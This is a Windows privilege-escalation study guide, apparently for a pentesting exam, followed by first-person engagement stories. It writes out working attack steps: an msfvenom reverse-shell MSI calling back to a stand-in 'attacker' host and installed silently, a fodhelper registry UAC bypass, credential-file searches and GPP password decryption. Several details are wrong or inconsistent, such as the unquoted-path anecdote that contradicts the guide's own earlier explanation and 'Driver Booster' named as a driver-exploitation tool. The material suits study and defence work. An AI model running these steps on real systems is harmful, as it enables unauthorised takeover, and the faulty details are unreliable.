Privilege Escalation on Windows

Integrity levels were introduced in Windows Vista (UAC). A standard user runs at medium integrity; an administrator runs at high integrity (when elevated). SYSTEM runs at system integrity. User Account Control (UAC) prevents automatic elevation—even administrators run with a filtered token at medium integrity unless they explicitly consent (elevation). This is why some escalation techniques bypass UAC.

#### 1. Kernel Exploits Kernel exploits target vulnerabilities in the Windows kernel to execute code with SYSTEM privileges. These are often patched by Microsoft, so unpatched systems are vulnerable. Examples include MS10-092 (Task Scheduler), MS16-135 (Win32k), and CVE-2021-1732 (Win32k).

How to check for missing patches:

wmic qfe list brief /format:table

Or use tools like Sherlock (PowerShell) or Watson (C#) to enumerate missing patches.

Exam tip: The exam may present a scenario where a user can run a kernel exploit that gives SYSTEM access. Look for clues like "Windows 7" or "Server 2008" (unpatched).

#### 2. Service Misconfigurations Services run with SYSTEM privileges by default. Misconfigurations allow low-privileged users to manipulate them.

Unquoted Service Paths: If the path to a service binary contains spaces and is not enclosed in quotes, Windows will attempt to execute each space-separated component as a command. For example:

C:\Program Files\Vulnerable Service\service.exe

If unquoted, Windows tries:

C:\Program.exe
C:\Program Files\Vulnerable.exe
C:\Program Files\Vulnerable Service\service.exe

An attacker can place a malicious executable named Program.exe in C:\ to gain SYSTEM privileges.

Detection:

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v "\""

Weak Service Permissions: The service DACL may allow a low-privileged user to modify the service binary or configuration. Use tools like AccessChk (Sysinternals) to check permissions:

accesschk.exe /accepteula -uwcqv "Users" *

If a user has SERVICE_CHANGE_CONFIG or WRITE_DAC permissions, they can change the binary path to run a malicious executable.

Vulnerable Service Binary Permissions: If the service binary file is writable by the user, they can replace it with a malicious one.

Detection:

icacls "C:\Program Files\Vulnerable Service\service.exe"

If BUILTIN\Users has (F) (full control), it's exploitable.

#### 3. AlwaysInstallElevated This registry setting forces Windows Installer to run with SYSTEM privileges regardless of the user's token. If both HKLM\Software\Policies\Microsoft\Windows\Installer and HKCU\Software\Policies\Microsoft\Windows\Installer have AlwaysInstallElevated set to 1, any user can install an .msi file as SYSTEM.

Exploitation: Create a malicious MSI using msfvenom or PowerShell and execute it.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi

#### 4. Scheduled Tasks If a scheduled task runs as SYSTEM and the task's executable or script is writable by a low-privileged user, they can replace it. Also, if the task's security descriptor allows modification, the user can change the action.

Check permissions:

schtasks /query /fo LIST /v

Look for tasks running as SYSTEM with NT AUTHORITY\SYSTEM. Then check if the binary is writable.

#### 5. Token Impersonation Windows allows a process to impersonate another user's token if it has the SeImpersonatePrivilege. This privilege is granted to services running as LOCAL SERVICE or NETWORK SERVICE. If an attacker gains access to such a service account, they can use tools like Juicy Potato or Rogue Potato to impersonate SYSTEM.

How it works: The service triggers a COM connection to a DCOM server that runs as SYSTEM. The attacker intercepts the token and uses it to execute code.

Detection: Check privileges with:

whoami /priv

Look for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.

#### 6. DLL Hijacking If an application loads a DLL without specifying a full path, Windows searches directories in a specific order (Safe DLL Search Mode). An attacker can place a malicious DLL in a directory that is searched before the legitimate one. Common vulnerable folders: C:\Windows\Temp, the application's directory, or the current working directory.

Detection: Use Process Monitor (Procmon) to filter for NAME NOT FOUND results for DLLs.

#### 7. Stored Credentials Low-privileged users may have access to saved credentials (e.g., in Windows Credential Manager, unattended installation files, or scripts).

Common locations: - C:\Windows\Panther\Unattend.xml or Unattended.xml - C:\Windows\System32\sysprep.inf - C:\Windows\System32\sysprep\sysprep.xml - dir /s *sysprep* or dir /s *unattend*

PowerShell to search:

Get-ChildItem -Path C:\ -Include *unattend*,*sysprep* -Recurse -ErrorAction SilentlyContinue

#### 8. Bypassing UAC Even if the user is in the Administrators group, they run with a filtered token (medium integrity) unless they elevate. UAC bypass techniques allow execution of code at high integrity without prompting. Common methods: - DLL hijacking on auto-elevated executables (e.g., fodhelper.exe, computerdefaults.exe) - Registry modifications (e.g., modifying HKCU\Software\Classes\ms-settings\shell\open\command) - Using `cmstp.exe` to execute arbitrary commands

Example with fodhelper:

reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c start powershell.exe" /f
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe

This opens a PowerShell window at high integrity without UAC prompt.

#### 9. Group Policy Preferences (GPP) Older Windows domains stored local administrator passwords in Group Policy Preferences (cpassword), which were encrypted with a known AES key. This is patched in Windows 10/Server 2016+, but older systems may still have them.

Detection:

Get-ChildItem -Path \\domain\SYSVOL\* -Include Groups.xml -Recurse

Decrypt cpassword using gpp-decrypt.

#### 10. Privilege Escalation via Vulnerable Drivers Third-party drivers signed by Microsoft may have vulnerabilities that allow arbitrary kernel memory access. Tools like Driver Booster or WinDbg can be used, but this is less common on the exam.

whoami
whoami /priv
whoami /groups

For SYSTEM:

whoami

Should return NT AUTHORITY\SYSTEM.

In a typical penetration test, I encountered a Windows Server 2012 R2 domain controller. After gaining a foothold as a domain user via phishing, I ran whoami /priv and saw SeImpersonatePrivilege. The server was running IIS, and the application pool identity was NETWORK SERVICE. I used Juicy Potato to escalate to SYSTEM by triggering a DCOM connection to spoolss (print spooler). This worked because the print spooler runs as SYSTEM and allows impersonation. The challenge was that Juicy Potato requires specific CLSID and port forwarding; I used port 135 with the -l option. After escalation, I dumped domain hashes with mimikatz.

Another scenario: During a red team engagement on a Windows 10 workstation, I found AlwaysInstallElevated set in both HKLM and HKCU. This is common in poorly configured corporate images. I created an MSI that added a local admin user using msfvenom. The MSI executed silently and gave me persistent admin access. The risk here is that any user, even a guest, can become admin.

A third example: On a legacy Windows 7 machine, I discovered an unquoted service path for a third-party antivirus service running as SYSTEM. The path was C:\Program Files\AV Corp\avservice.exe. I placed a malicious Program.exe in C:\Program Files (which was writable by Users). After restarting the service, Windows executed my Program.exe as SYSTEM. This technique is common in older systems where developers forget to quote paths.

Common pitfalls include: not checking if the user can actually restart the service (requires SERVICE_START permission), or targeting a service that is already running but cannot be stopped. Also, some antivirus software monitors service binary changes. Always verify permissions with accesschk before attempting.